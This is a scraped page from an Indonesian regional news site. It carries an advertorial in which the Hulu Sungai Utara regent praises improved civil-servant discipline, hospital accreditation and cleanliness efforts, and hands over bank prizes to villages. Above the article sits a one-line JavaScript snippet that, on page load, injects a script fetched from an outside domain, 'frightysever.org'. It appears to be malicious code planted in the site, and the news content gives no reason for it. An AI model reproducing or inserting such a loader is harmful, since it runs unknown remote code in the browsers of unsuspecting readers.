(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Bupati Wahid Apresiasi Meningkatnya Disiplin Pegawai


AMUNTAI, Semenjak diberlakukannya absensi online untuk PNS maupun honorer di lingkungan Pemkab Hulu Sungai Utara (HSU) awal Maret lalu, Bupati HSU H Abdul Wahid HK, mengapresiasi semakin meningkatnya kedisiplinan pegawai. Hal tersebut disampaikan saat apel pagi gabungan di halaman Kantor Bupati HSU, Senin (16/4).

“Saya sangat bahagia melihat kehadiran para pegawai, khususnya saat pelaksanaan apel pagi gabungan pada hari ini,” ungkap Wahid.

Wahid mengatakan, kehadiran para pegawai untuk mengikuti apel pagi gabungan pada hari ini lebih banyak daripada biasanya. Hal tersebut menurutnya merupakan salah satu bentuk perhatian para pegawai terhadap tanggung jawabnya terkait peningkatan disiplin dan kinerja.

Hal ini membuktikan adanya perhatian para pegawai setelah sebelumnya diberikan arahan untuk meningkatkan disiplin dan kinerja. “Semoga hal ini bisa dipertahankan dan ditingkatkan,” harap Wahid.

Diajuga berharap kepada seluruh SKPD untuk meningkatkan kinerjanya, terutama pelayanan terhadap masyarakat, guna mewujudkan visi dan misi HSU MANTAP (Maju, Mandiri, Sejahtera, Agamis, dan Produktif).

Wahid juga mengapresiasi peningkatan layanan kesehatan di Kabupaten Hulu Sungai Utara yang dibuktikan dengan diraihnya akreditasi bintang lima (paripurna) oleh RSUD Pambalah Batung Amuntai dan UPT Puskesmas Haur Gading.

“Dengan diraihnya akreditasi tersebut, semoga pelayanan kesehatan untuk semua kalangan di Kabupaten HSU semakin meningkat,” imbuh Wahid.

Selainitu, dirinya juga mengimbau kepada seluruh pegawai agar turut mendukung dan selalu memperhatikan kebersihan lingkungan, guna menciptakan lingkungan yang bersih dan nyaman di daerah. “Semoga HSU dapat meraih Adipura, namun hal tersebut bukanlah tujuan utama, yang penting kita selalu berupaya menciptakan lingkungan yang bersih dan sehat,” pungkasnya.

Disamping apel gabungan, dalam kesempatan tersebut juga diisi serah terima hadiah “Salanjung Rezeki” dari Bank Kalsel Cabang Amuntai berupa Simpanan Pembangunan Daerah (Simpeda), yaitu Main Prize sebesar Rp 50.000.000 kepada Desa Pal Batu Kecamatan Paminggir dan Reguler Prize sebesar Rp 10.000.000 kepada Desa Sungai Pinang Kecamatan Sungai Pandan.

Penyerahan hadiah yang diperuntukkan sebagai Kas Desa tersebut diberikan secara simbolis oleh Bupati HSU dan diterima langsung oleh Kepala Desa masing-masing yang disaksikan oleh Pimpinan Bank Kalsel Cabang Amuntai Abdurrahim Fikri, para pejabat serta para peserta apel. (dew)

Reporter: Dew
Editor: Chell

Desy Arfianty

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 14 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

9 menit ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

59 menit ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

2 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

4 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

4 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

6 jam ago

This website uses cookies.